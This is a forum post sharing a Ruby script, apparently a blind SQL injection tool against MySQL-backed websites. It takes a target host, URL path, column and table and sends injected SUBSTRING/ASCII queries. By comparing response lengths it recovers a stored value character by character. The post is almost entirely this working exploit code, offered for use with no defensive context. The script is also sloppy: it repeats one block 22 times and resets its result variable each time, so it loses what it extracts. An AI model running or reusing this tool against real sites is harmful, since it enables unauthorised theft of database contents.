Jump to content
Nytro

[ruby] Rblind SQL Injection tool

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 
#MySQL Blind Inyection Tool
#Coder => SH4V
#n3t-datagrams.net
require 'net/http'
puts  "host:"
host=gets.chomp
puts "extension:"
ext=gets.chomp
puts "columna:"
col=gets.chomp
puts "tabla:"
tab= gets.chomp

num="0"
url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
http= Net::HTTP.new(host)
corp1=http.get("#{url}")
corp1=corp1.body
corp2=http.get("#{url}333")
corp2=corp2.body
lon1=corp1.length
lon2=corp2.length

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),1,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),2,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),3,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),4,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),5,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),6,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),7,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),8,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),9,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),10,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),11,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

res=String.new
res << "#{num}, "
lon1=lon2
num="0"

while lon1 == lon2
   num=num.succ
   url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}"
   http= Net::HTTP.new(host)
   corp1=http.get("#{url}")
   corp1=corp1.body
   lon1=corp1.length
end

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...